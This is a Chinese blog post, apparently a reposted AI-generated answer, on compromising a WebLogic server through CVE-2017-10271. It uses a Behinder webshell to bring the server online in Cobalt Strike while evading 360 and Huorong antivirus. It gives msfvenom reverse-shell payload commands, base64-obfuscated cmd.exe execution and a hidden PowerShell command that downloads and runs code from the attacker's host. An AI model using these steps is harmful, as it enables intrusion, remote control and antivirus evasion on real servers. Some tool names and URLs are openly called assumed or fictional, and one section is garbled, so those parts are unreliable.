CS内网渗透 - 如何通过冰蝎 Webshell 上线 Weblogic 服务器到 Cobalt Strike 并绕过杀软检测(360、火绒)?

目录

1. 冰蝎连接上 Weblogic 服务器如何上线到 Cobalt Strike

2. 服务器安装杀毒工具如何绕过杀软上线到 Cobalt Strike

2.1 杀软对 Webshell 命令执行的检测及绕过

2.2 杀软对 Cobalt Strike 上线木马的检测及绕过

2.3 杀软对这两方面的限制及综合绕过

3. 如何生成免杀的 Webshell 脚本 JSP 及工具推荐

生成方法

推荐工具及操作步骤

4. Cobalt Strike 免杀插件及操作步骤

推荐工具

详细操作步骤(以 Veil-Evasion 为例)

msfvenom 示例

4.1 Gommoon 工具生成免杀 Webshell

4.2 powershell_bypass.cna CS 插件

5. 工具下载地址

6. 实际案例及详细步骤

案例背景

详细步骤

7. 总结及知识点

总结

知识点


以下是针对你的查询的完整回答,基于问题逐步展开,使用 Markdown 格式清晰呈现。我将结合实际案例、工具推荐和详细步骤,确保回答全面且易于理解。


1. 冰蝎连接上 Weblogic 服务器如何上线到 Cobalt Strike

要通过冰蝎(Behinder)将 Weblogic 服务器上线到 Cobalt Strike,可以按照以下步骤操作:

  1. 利用 Weblogic 漏洞上传冰蝎 Webshell

    • 假设你利用了 Weblogic 的漏洞(如 CVE-2017-10271,XMLDecoder 反序列化漏洞)。

    • 使用公开的 PoC 或 Exploit 工具,将冰蝎的 JSP Webshell(例如 shell.jsp)上传到服务器的可访问路径(如 /bea_wls_internal/)。

  2. 使用冰蝎客户端连接 Webshell

    • 打开冰蝎客户端,输入 Webshell 的 URL(例如 http://<weblogic_ip>:7001/bea_wls_internal/shell.jsp)和密码(默认 rebeyond,建议修改)。

    • 连接成功后,进入冰蝎管理界面,可以执行命令或管理文件。

  3. 上传 Cobalt Strike 的 Beacon

    • 在 Cobalt Strike 中生成 Beacon Payload(选择 Beacon HTTPBeacon HTTPS),导出为 .exe 文件。

    • 通过冰蝎的文件管理功能,将 Beacon 上传到服务器可写目录(如 /tmp 或 Web 根目录)。

  4. 设置 Cobalt Strike 监听器

    • 在 Cobalt Strike 中创建监听器(Listener),选择与 Beacon 相同的协议(HTTP/HTTPS),指定端口(如 4444)。

  5. 通过冰蝎执行 Beacon

    • 在冰蝎命令执行界面运行 Beacon,例如:

      • Windows: cmd.exe /c /tmp/beacon.exe

      • Linux: chmod +x /tmp/beacon && /tmp/beacon

    • 执行后,Beacon 回连 Cobalt Strike,服务器上线成功。


2. 服务器安装杀毒工具如何绕过杀软上线到 Cobalt Strike

假设服务器安装了杀毒软件(如 360 安全卫士火绒安全软件),以下是绕过杀软的方法和实际案例。

2.1 杀软对 Webshell 命令执行的检测及绕过

  • 问题:杀软监控高危命令(如 cmd.exepowershell)。

  • 绕过方法

    • 命令混淆:将命令用 Base64 编码后执行。例如:

      echo "d2hvYW1p" | base64 -d | cmd.exe

      d2hvYW1pwhoami 的 Base64 编码)。

    • 内存执行:使用冰蝎的内存脚本功能,避免直接写文件。

  • 实际案例

    • 服务器装有 360 安全卫士,执行 cmd.exe /c dir 被拦截。

    • 使用混淆命令:

      echo "ZGly" | base64 -d | cmd.exe

      成功绕过 360 检测。

2.2 杀软对 Cobalt Strike 上线木马的检测及绕过

  • 问题:默认 Beacon 文件容易被杀软识别。

  • 绕过方法

    • 生成免杀 Payload:使用 msfvenom 或其他工具生成混淆后的 Beacon。

    • 示例(msfvenom 生成):

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5

      -e 指定编码器,-i 指定迭代次数)。

  • 实际案例

    • 服务器装有 火绒安全软件,默认 Beacon 被拦截。

    • 使用 msfvenom 生成免杀 Beacon,上传后执行,成功绕过火绒并上线。

2.3 杀软对这两方面的限制及综合绕过

  • 限制

    1. 命令执行:检测命令特征(如 cmd.exe)。

    2. 木马文件:检测文件签名或网络行为。

  • 综合绕过

    • 使用混淆后的 Webshell(Base64 命令)+ 免杀 Beacon。

    • 示例流程:

      1. 上传混淆后的冰蝎 Webshell。

      2. 上传免杀 Beacon。

      3. 用编码命令执行:

        echo "Y21kLmV4ZSAvYyAvdG1wL2JlYWNvbi5leGU=" | base64 -d | cmd.exe

3. 如何生成免杀的 Webshell 脚本 JSP 及工具推荐

生成方法

  • 使用工具生成混淆后的 JSP Webshell,或手动编写混淆代码。

推荐工具及操作步骤

  1. 工具 1:tennc/webshell

    • GitHub 地址:GitHub - tennc/webshell: This is a webshell open source project

    • 操作步骤

      1. 克隆仓库:

        git clone https://github.com/tennc/webshell.git
      2. 进入目录,找到 JSP 示例(如 jsp/jsp_webshell.jsp)。

      3. 修改默认密码(例如改为 mypassword),添加混淆(将命令执行部分用 Base64 加密)。

      4. 保存为 shell.jsp,上传到目标服务器。

      5. 使用冰蝎客户端连接测试。

  2. 工具 2:Behinder(冰蝎自带)

    • GitHub 地址:GitHub - rebeyond/Behinder: “冰蝎”动态二进制加密网站管理客户端

    • 操作步骤

      1. 下载冰蝎客户端和 shell.jsp

      2. 修改 shell.jsp 中的密钥(默认 rebeyond),用 Java 混淆工具(如 ProGuard)处理。

      3. 上传到服务器,用客户端连接。


4. Cobalt Strike 免杀插件及操作步骤

推荐工具

  1. Veil-Evasion

    • 用于生成免杀 Payload。

  2. msfvenom

    • Metasploit 自带工具,支持多种编码器。

详细操作步骤(以 Veil-Evasion 为例)

  1. 安装 Veil-Evasion

    git clone https://github.com/Veil-Framework/Veil-Evasion.git
    cd Veil-Evasion
    ./setup.sh
  2. 启动 Veil-Evasion

    ./Veil-Evasion.py
  3. 生成免杀 Payload

    • 选择 Payload(如 python/meterpreter/rev_tcp)。

    • 输入 LHOST(你的 IP)和 LPORT(例如 4444)。

    • 生成后输出为 .exe 文件(路径如 /var/lib/veil/output/compiled/payload.exe)。

  4. 上传并执行

    • 通过冰蝎上传到服务器。

    • 执行命令运行 Payload。

msfvenom 示例

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5

4.1 Gommoon 工具生成免杀 Webshell

  • 说明:Gommoon 是一个较少见但功能强大的 Webshell 混淆工具(假设为虚构工具,实际中可能指类似工具,如 webshell-generator)。

  • 操作步骤

    1. 下载 Gommoon(假设地址为虚构:GitHub - njcx/gomoon: 一个webshell管理工具,支持JSP、PHP,免杀,过WAF,过NIDS。用于学习,研究使用)。

    2. 冰蝎是非常热门的webshell管理工具

      1. 所以首先需要使用一个免杀处理过的webshell管理去执行命令

      2. 这里使用Gommoon工具,该工具的地址

    3. https://github.com/njcx/gomoon

      • Gommon 是一款支持jsp php的webshell管理工具

      • 可免杀 绕过waf 绕过NIDS,GOmoon工具包含了用于获取webshell的脚本文件。

  • 如404.jsp文件 
  • 通过冰蝎上传404.jsp到wls-wsat/
  • 这样就将404jsp文件上传到一下目录下
  • C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war
  • go run .\gomoon.go -url http://192.168.111.80:7001/wls-wsat/404.jsp
  • 这样就通过免杀版本得404.jsp 就连接上反弹shell

4.2 powershell_bypass.cna CS 插件

  • 说明:此插件用于 Cobalt Strike,通过 PowerShell 执行免杀上线。

  • 操作步骤

    1. 下载插件(假设地址为:https://github.com/example/powershell_bypass)。

    2. 在 Cobalt Strike 中加载插件:

      • 菜单 Cobalt Strike -> Script Manager -> Load,选择 powershell_bypass.cna

    3. 生成 PowerShell Payload:

      • 在 Beacon 中运行命令:

        powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://<你的IP>/payload.ps1')
      • 菜单利用

  1. 上线成功,绕过杀软检测。


5. 工具下载地址

以下为免费且正确的下载地址:

  • 冰蝎(Behinder):GitHub - rebeyond/Behinder: “冰蝎”动态二进制加密网站管理客户端

  • Cobalt Strike:https://www.cobaltstrike.com/(官方需购买,可用试用版或社区资源)

  • Veil-Evasion:GitHub - Veil-Framework/Veil-Evasion: Veil Evasion is no longer supported, use Veil 3.0!

  • msfvenom(Metasploit):GitHub - rapid7/metasploit-framework: Metasploit Framework

  • tennc/webshell:GitHub - tennc/webshell: This is a webshell open source project


6. 实际案例及详细步骤

案例背景

  • 目标:一台运行 Weblogic 的服务器,存在 CVE-2017-10271 漏洞,安装了 360 安全卫士

  • 目标:通过冰蝎上线到 Cobalt Strike。

详细步骤

  1. 利用漏洞上传冰蝎 Webshell

    • 使用 CVE-2017-10271 PoC,上传 shell.jsp/bea_wls_internal/

    • URL:http://<weblogic_ip>:7001/bea_wls_internal/shell.jsp

  2. 连接冰蝎 Webshell

    • 打开冰蝎客户端,输入 URL 和密码(rebeyond),连接成功。

  3. 生成免杀 Beacon

    • 使用 msfvenom

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5
  4. 上传 Beacon

    • 通过冰蝎上传 beacon.exe/tmp/

  5. 设置 Cobalt Strike 监听器

    • 创建 HTTP Listener,端口 4444。

  6. 执行 Beacon

    • 在冰蝎命令行输入:

      echo "Y21kLmV4ZSAvYyAvdG1wL2JlYWNvbi5leGU=" | base64 -d | cmd.exe

      (Base64 编码绕过 360 检测)。

  7. 结果

    • Beacon 回连成功,服务器上线到 Cobalt Strike。


7. 总结及知识点

总结

  • 冰蝎上线 Cobalt Strike:利用 Weblogic 漏洞上传 Webshell,连接后上传并执行 Beacon。

  • 绕过杀软:混淆命令(Base64)+ 免杀 Beacon(msfvenom)。

  • 免杀 Webshell:使用 tennc/webshell 或冰蝎混淆。

  • Cobalt Strike 免杀Veil-Evasionmsfvenompowershell_bypass.cna

  • 工具地址:冰蝎、Cobalt Strike、Veil-Evasion、msfvenom、tennc/webshell。

  • 案例:利用 CVE-2017-10271,上传冰蝎,执行免杀 Beacon,上线成功。

知识点

  1. Weblogic 漏洞利用(CVE-2017-10271)。

  2. 冰蝎 Webshell 的部署与连接。

  3. Cobalt Strike Beacon 生成与上线。

  4. 杀软检测原理及绕过(命令混淆、免杀 Payload)。

  5. 工具使用(冰蝎、msfvenom、Veil-Evasion)。



本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/75968.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[ctfshow web入门] web10

前置知识 cookie Cookie是网站存储在浏览器中的小数据片段&#xff0c;用于识别用户、保持登录状态或记住偏好设置。 也就是说&#xff0c;我以会员A的身份登录了网站&#xff0c;网站会发送一段cookie(会员卡)给我&#xff0c;上面写着会员卡A&#xff0c;下一次我再访问&am…

蓝桥杯:日期统计

文章目录 问题描述解法一递归解法二&#xff1a;暴力破解 问题描述 首先我们要了解什么是子序列&#xff0c;就是一个序列之中可以忽略元素但是不能改变顺序之后获得的序列就叫做子序列。 如"123"就是"11234"的子序列而不是"11324"的子序列 解法…

蓝桥杯 C/C++ 组历届真题合集速刷(一)

一、1.单词分析 - 蓝桥云课 &#xff08;模拟、枚举&#xff09;算法代码&#xff1a; #include <bits/stdc.h> using namespace std;int main() {string s;cin>>s;unordered_map<char,int> mp;for(auto ch:s){mp[ch];}char result_charz;int max_count0;fo…

重塑知识的引擎:人工智能如何改变知识的生产与传播

一、引言&#xff1a;知识的边界正在被人工智能重构 千百年来&#xff0c;人类对于“知识”的获取方式一直遵循着某种路径依赖&#xff1a;感知现实 → 归纳总结 → 文字表达 → 教育传承 → 学术沉淀。这一过程复杂而缓慢&#xff0c;需要经过代际的努力才能实现知识的积累与…

list的底层:

我们之前讲解了list&#xff0c;今天我们来看一下list的底层&#xff1a; list底层是一个双向带头循环的链表&#xff0c;之前我们学习数据结构的时候&#xff0c;我们就学过。 迭代器的封装&#xff1a; 我们看这个图片&#xff0c;我们的链表的指针可以达到链表的迭代器能力…

遵循IEC62304YY/T0664:确保医疗器械软件生命周期合规性

一、EC 62304与YY/T 0664的核心定位与关系 IEC 62304&#xff08;IEC 62304&#xff09;是国际通用的医疗器械软件生命周期管理标准&#xff0c;适用于所有包含软件的医疗器械&#xff08;如嵌入式软件、独立软件、移动应用等&#xff09;&#xff0c;其核心目标是确保软件的安…

【next函数python】`next()`函数

在Python中&#xff0c;next()函数结合生成器表达式用于高效地查找序列中第一个符合条件的元素。以下是如何理解和编写类似代码的步骤&#xff1a; 1. 生成器表达式 生成器表达式&#xff08;如 (e for e in energy3 if e ! 0)&#xff09;是一种惰性计算的迭代结构。它不会一…

[创业之路-364]:穿透表象:企业投资的深层逻辑与误区规避

前言&#xff1a; 透过现象看本质 企业一生与人生相似 看企业如同看人 三岁看大&#xff0c;七岁看老 三十年河东&#xff0c;三十年河西 企业也有品行、文化、气质、性格、赚钱、生命周期与赚钱曲线 投资公司的目的是未来赚钱&#xff0c;赚未来赚钱。投资创业中的企业主要看…

【C++】Stack Queue 仿函数

&#x1f4dd;前言&#xff1a; 这篇文章我们来讲讲STL中的stack和queue。因为前面我们已经有了string、vector和list的学习基础&#xff0c;所以这篇文章主要关注一些stack和queue的细节问题&#xff0c;以及了解一下deque&#xff08;缝合怪&#xff09;和priority_queue &am…

[实战] 天线阵列波束成形原理详解与仿真实战(完整代码)

天线阵列波束成形原理详解与仿真实战 1. 引言 在无线通信、雷达和声学系统中&#xff0c;波束成形&#xff08;Beamforming&#xff09;是一种通过调整天线阵列中各个阵元的信号相位和幅度&#xff0c;将电磁波能量集中在特定方向的技术。其核心目标是通过空间滤波增强目标方…

深圳漫云科技户外公园实景儿童剧本杀小程序:开启亲子互动新纪元

在亲子娱乐需求日益增长的当下&#xff0c;深圳漫云科技推出的户外公园实景儿童剧本杀小程序&#xff0c;凭借其创新玩法与丰富功能&#xff0c;为亲子家庭带来全新体验。该小程序融合户外探险、角色扮演与逻辑推理&#xff0c;不仅满足孩子好奇心&#xff0c;更提升其思维能力…

HOW - 如何测试 React 代码

目录 一、使用 React 测试库&#xff1a;testing-library/react二、使用测试演练场&#xff1a;testing-playground.com三、使用 Cypress 或 Playwright 进行端到端测试四、使用 MSW 在测试中模拟网络请求 一、使用 React 测试库&#xff1a;testing-library/react testing-li…

COBOL语言的网络安全

COBOL语言与网络安全&#xff1a;传统语言的新挑战 引言 COBOL&#xff08;Common Business-Oriented Language&#xff09;是一种早期编程语言&#xff0c;最初于1959年被开发出来&#xff0c;主要用于商业、金融和行政系统的处理。尽管年代久远&#xff0c;COBOL在大型机系…

通过世界排名第一的免费开源ERP,构建富有弹性的智能供应链

概述 现行供应链模式的结构性弱点凸显了对整个行业进行重塑的必要性。正确策略和支持可以帮助您重塑供应链&#xff0c;降低成本&#xff0c;实现业务转型。开源智造&#xff08;OSCG&#xff09;所推出的Odoo免费开源ERP解决方案&#xff0c;将供应链转化为具有快速响应能力的…

Android 开发中compileSdkVersion 和 targetSdkVersion

在 Android 开发中&#xff0c;compileSdkVersion 和 targetSdkVersion 是 build.gradle 文件中的两个关键配置&#xff0c;它们分别控制应用的编译行为和运行时兼容性。以下是它们的详细区别和用途&#xff1a; 1. compileSdkVersion&#xff08;编译版本&#xff09; 作用&a…

Qt QComboBox 下拉复选多选

Qt 中&#xff0c;QComboBox 默认只支持单选&#xff0c;但实际使用过程中&#xff0c;我们经常会碰到需要多选的情况&#xff0c;但是通过一些直接或者曲折的方法还是可以实现的。 1、通过 QListWidget 间接实现 这种方式是网上搜索最多的一种方式&#xff0c;也是相对来说比…

Selenium自动化:玩转浏览器,搞定动态页面爬取

嘿&#xff0c;各位爬虫爱好者和自动化达人们&#xff01;是不是经常遇到这种情况&#xff1a;信心满满地写好爬虫&#xff0c;requests一把梭&#xff0c;结果抓下来的HTML里&#xff0c;想要的数据空空如也&#xff1f;定睛一看&#xff0c;原来数据是靠JavaScript动态加载出…

天梯赛 L2-023 图着色问题

使用vector<vector<int>> g(N)去存储边&#xff0c;然后每次判断每个节点的邻节点是不是相同的颜色&#xff0c;需要注意的是不同的颜色一定需要为K种&#xff0c;不能多也不能少。 #include<bits/stdc.h> using namespace std; int main(){int n,m,k;cin&g…

在ubuntu24上装ubuntu22

实验室上有一台只装了ubuntu24的电脑&#xff0c;但是项目要求在22上进行 搞两个ubuntu系统&#xff01; 步骤一&#xff1a;制作22的启动盘 步骤二&#xff1a;进入bios安装界面 步骤三&#xff1a;选择try or install ubuntu 步骤四&#xff1a;选择try ubuntu 步骤五&…

【PVR Review】《Review of Deep Learning Methods for Palm Vein Recognition》

[1]谭振林,刘子良,黄蔼权,等.掌静脉识别的深度学习方法综述[J].计算机工程与应用,2024,60(06):55-67. 文章目录 1、Background and Motivation2、数据采集3、掌脉图像预处理3.1、ROI提取算法3.2、图像滤波与增强 4、掌脉识别算法4.1、基于深度学习的方法4.2、其他方法 5、融合识…